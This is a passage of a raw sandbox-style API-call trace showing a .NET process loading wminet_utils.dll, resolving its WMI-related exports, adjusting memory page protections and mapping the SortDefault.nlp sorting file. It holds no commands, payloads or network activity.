lpProcName="WideCharToMultiByte") returned 0x76d4170d [0081.299] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=63, lpWideCharStr=0x6ebc80, cchWideChar=2047 | out: lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll¯Ő¯") returned 63 [0081.299] SysReAllocStringLen (in: pbstr=0x6ecc84*=0x0, psz="wminet_utils.dll", len=0x10 | out: pbstr=0x6ecc84*="wminet_utils.dll") returned 1 [0081.300] CharLowerBuffW (in: lpsz="wminet_utils.dll", cchLength=0x10 | out: lpsz="wminet_utils.dll") returned 0x10 [0081.300] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x749b0000 [0081.539] GetLastError () returned 0x0 [0081.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b6068, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x4, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x2) returned 0x0 [0081.540] GetCurrentProcess () returned 0xffffffff [0081.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b6068, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x2, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x4) returned 0x0 [0081.540] GetCurrentProcess () returned 0xffffffff [0081.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b606c, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x4, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x2) returned 0x0 [0081.540] GetCurrentProcess () returned 0xffffffff [0081.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b606c, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x2, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x4) returned 0x0 [0081.540] GetCurrentProcess () returned 0xffffffff [0081.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b6078, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x4, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x2) returned 0x0 [0081.541] GetCurrentProcess () returned 0xffffffff [0081.541] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b6078, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x2, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x4) returned 0x0 [0081.541] GetCurrentProcess () returned 0xffffffff [0081.541] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b607c, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x4, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x2) returned 0x0 [0081.542] GetCurrentProcess () returned 0xffffffff [0081.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b607c, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x2, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x4) returned 0x0 [0081.542] GetCurrentProcess () returned 0xffffffff [0081.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b6098, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x4, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x2) returned 0x0 [0081.542] GetCurrentProcess () returned 0xffffffff [0081.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc68*=0x749b6098, NumberOfBytesToProtect=0x6ecc6c, NewAccessProtection=0x2, OldAccessProtection=0x6ecca0 | out: BaseAddress=0x6ecc68*=0x749b6000, NumberOfBytesToProtect=0x6ecc6c, OldAccessProtection=0x6ecca0*=0x4) returned 0x0 [0081.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x6ecd04, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 13 [0081.545] GetProcAddress (hModule=0x749b0000, lpProcName="ResetSecurity") returned 0x749b24de [0081.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x6ecd04, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0081.576] GetProcAddress (hModule=0x749b0000, lpProcName="SetSecurity") returned 0x749b2520 [0081.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x6ecd00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 18 [0081.585] GetProcAddress (hModule=0x749b0000, lpProcName="BlessIWbemServices") returned 0x749b1c69 [0081.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x6eccf8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 24 [0081.626] GetProcAddress (hModule=0x749b0000, lpProcName="BlessIWbemServicesObject") returned 0x749b1cbb [0081.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x6ecd00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 17 [0081.645] GetProcAddress (hModule=0x749b0000, lpProcName="GetPropertyHandle") returned 0x749b21b4 [0081.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x6ecd00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 18 [0081.656] GetProcAddress (hModule=0x749b0000, lpProcName="WritePropertyValue") returned 0x749b2617 [0081.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x6ecd0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 5 [0081.668] GetProcAddress (hModule=0x749b0000, lpProcName="Clone") returned 0x749b1d0d [0081.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x6ecd00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0081.675] GetProcAddress (hModule=0x749b0000, lpProcName="VerifyClientKey") returned 0x749b25b4 [0081.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x6ecd0c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0081.715] GetProcAddress (hModule=0x749b0000, lpProcName="Put") returned 0x749b22be [0081.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x6ecd0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 6 [0081.729] GetProcAddress (hModule=0x749b0000, lpProcName="Delete") returned 0x749b1f31 [0081.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x6ecd0c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 4 [0081.781] GetProcAddress (hModule=0x749b0000, lpProcName="Next") returned 0x749b2283 [0081.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x6ecd04, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 14 [0081.800] GetProcAddress (hModule=0x749b0000, lpProcName="EndEnumeration") returned 0x749b1fc2 [0081.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x6eccf8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0081.809] GetProcAddress (hModule=0x749b0000, lpProcName="GetPropertyQualifierSet") returned 0x749b21ff [0081.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x6ecd0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 5 [0081.821] GetProcAddress (hModule=0x749b0000, lpProcName="Clone") returned 0x749b1d0d [0081.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x6ecd04, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 13 [0081.821] GetProcAddress (hModule=0x749b0000, lpProcName="GetObjectText") returned 0x749b219e [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x6ecd00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 17 [0081.831] GetProcAddress (hModule=0x749b0000, lpProcName="SpawnDerivedClass") returned 0x749b2566 [0081.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x6ecd04, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 13 [0081.833] GetProcAddress (hModule=0x749b0000, lpProcName="SpawnInstance") returned 0x749b257c [0081.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x6ecd00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 17 [0081.836] GetProcAddress (hModule=0x749b0000, lpProcName="GetPropertyOrigin") returned 0x749b21e9 [0081.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x6ecd04, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 12 [0081.839] GetProcAddress (hModule=0x749b0000, lpProcName="InheritsFrom") returned 0x749b2228 [0081.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x6ecd08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 9 [0081.841] GetProcAddress (hModule=0x749b0000, lpProcName="PutMethod") returned 0x749b23da [0081.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x6ecd04, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 12 [0081.844] GetProcAddress (hModule=0x749b0000, lpProcName="DeleteMethod") returned 0x749b1f44 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x6eccfc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumerationD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 20 [0081.847] GetProcAddress (hModule=0x749b0000, lpProcName="EndMethodEnumeration") returned 0x749b1fd2 [0081.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x6ecd00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_PutD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 16 [0081.849] GetProcAddress (hModule=0x749b0000, lpProcName="QualifierSet_Put") returned 0x749b247a [0081.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x6eccfc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0081.851] GetProcAddress (hModule=0x749b0000, lpProcName="QualifierSet_Delete") returned 0x749b2409 [0081.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x6eccf4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 29 [0081.853] GetProcAddress (hModule=0x749b0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x749b23f6 [0081.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x6eccf4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0081.856] GetProcAddress (hModule=0x749b0000, lpProcName="QualifierSet_EndEnumeration") returned 0x749b241c [0081.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x6eccfc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStubD\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 20 [0081.858] GetProcAddress (hModule=0x749b0000, lpProcName="GetDemultiplexedStub") returned 0x749b20f3 [0081.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x6eccfc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi\x1a1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 21 [0081.863] GetProcAddress (hModule=0x749b0000, lpProcName="CreateInstanceEnumWmi") returned 0x749b1ebb [0081.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x6ecd00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi1u\x8d\x7f5\x82\x94 tÈÏn", lpUsedDefaultChar=0x0) returned 18 [0081.866] GetProcAddress (hModule=0x749b0000, lpProcName="CreateClassEnumWmi") returned 0x749b1e45 [0081.875] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ed538 | out: pAptType=0x6ed538*=1) returned 0x0 [0081.878] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ed53c | out: ppvObject=0x6ed53c*=0x0) returned 0x80004002 [0081.878] IUnknown:Release (This=0xb51e34) returned 0x0 [0081.903] SysReAllocStringLen (in: pbstr=0x6ece5c*=0x0, psz="nlssorting.dll", len=0xe | out: pbstr=0x6ece5c*="nlssorting.dll") returned 1 [0081.903] CharLowerBuffW (in: lpsz="nlssorting.dll", cchLength=0xe | out: lpsz="nlssorting.dll") returned 0xe [0081.903] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll", hFile=0x0, dwFlags=0x8) returned 0x74990000 [0082.020] GetLastError () returned 0x0 [0082.020] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a0004, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x4, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x2) returned 0x0 [0082.021] GetCurrentProcess () returned 0xffffffff [0082.021] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a0004, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x2, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x4) returned 0x0 [0082.021] GetCurrentProcess () returned 0xffffffff [0082.021] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a000c, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x4, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x2) returned 0x0 [0082.021] GetCurrentProcess () returned 0xffffffff [0082.021] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a000c, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x2, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x4) returned 0x0 [0082.021] GetCurrentProcess () returned 0xffffffff [0082.021] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a0010, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x4, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x2) returned 0x0 [0082.022] GetCurrentProcess () returned 0xffffffff [0082.022] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a0010, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x2, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x4) returned 0x0 [0082.022] GetCurrentProcess () returned 0xffffffff [0082.022] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a0014, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x4, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x2) returned 0x0 [0082.022] GetCurrentProcess () returned 0xffffffff [0082.022] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a0014, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x2, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x4) returned 0x0 [0082.022] GetCurrentProcess () returned 0xffffffff [0082.022] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a001c, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x4, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x2) returned 0x0 [0082.023] GetCurrentProcess () returned 0xffffffff [0082.023] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece44*=0x749a001c, NumberOfBytesToProtect=0x6ece48, NewAccessProtection=0x2, OldAccessProtection=0x6ece7c | out: BaseAddress=0x6ece44*=0x749a0000, NumberOfBytesToProtect=0x6ece48, OldAccessProtection=0x6ece7c*=0x4) returned 0x0 [0082.023] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0082.025] GetLastError () returned 0x0 [0082.025] SysReAllocStringLen (in: pbstr=0x6ecddc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", len=0x3d | out: pbstr=0x6ecddc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp") returned 1 [0082.025] GetThreadLocale () returned 0x409 [0082.025] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0082.025] GetThreadLocale () returned 0x409 [0082.025] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0082.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", nBufferLength=0x104, lpBuffer=0x6ecb60, lpFilePart=0x6ecb5c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", lpFilePart=0x6ecb5c*="SortDefault.nlp") returned 0x3d [0082.025] SysReAllocStringLen (in: pbstr=0x6ecddc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", len=0x3d | out: pbstr=0x6ecddc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp") returned 1 [0082.025] SysReAllocStringLen (in: pbstr=0x6ecd8c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", len=0x3d | out: pbstr=0x6ecd8c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp") returned 1 [0082.025] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", cchLength=0x3d | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") returned 0x3d [0082.025] SysReAllocStringLen (in: pbstr=0x6ecddc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SortDefault.nlp", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp", len=0x3d | out: pbstr=0x6ecddc*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") returned 1 [0082.025] SetLastError (dwErrCode=0x0) [0082.026] CreateFileMappingA (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] ResetEvent (hEvent=0xb8) returned 1 [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] ResetEvent (hEvent=0xb8) returned 1 [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] SetEvent (hEvent=0xbc) returned 1 [0082.026] SetEvent (hEvent=0xb8) returned 1 [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] GetCurrentThreadId () returned 0xb0c [0082.026] SetEvent (hEvent=0xbc) returned 1 [0082.026] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5ca0000 [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] ResetEvent (hEvent=0xb8) returned 1 [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] ResetEvent (hEvent=0xb8) returned 1 [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] SetEvent (hEvent=0xbc) returned 1 [0082.027] SetEvent (hEvent=0xb8) returned 1 [0082.027] CloseHandle (hObject=0x290) returned 1 [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] ResetEvent (hEvent=0xb8) returned 1 [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] ResetEvent (hEvent=0xb8) returned 1 [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] GetCurrentThreadId () returned 0xb0c [0082.027] SetEvent (hEvent=0xbc) returned 1 [0082.027] SetEvent (hEvent=0xb8) returned 1 [0082.027] CloseHandle (hObject=0x28c) returned 1 [0082.034] SysReAllocStringLen (in: pbstr=0x6ed0ac*=0x0, psz="kernel32", len=0x8 | 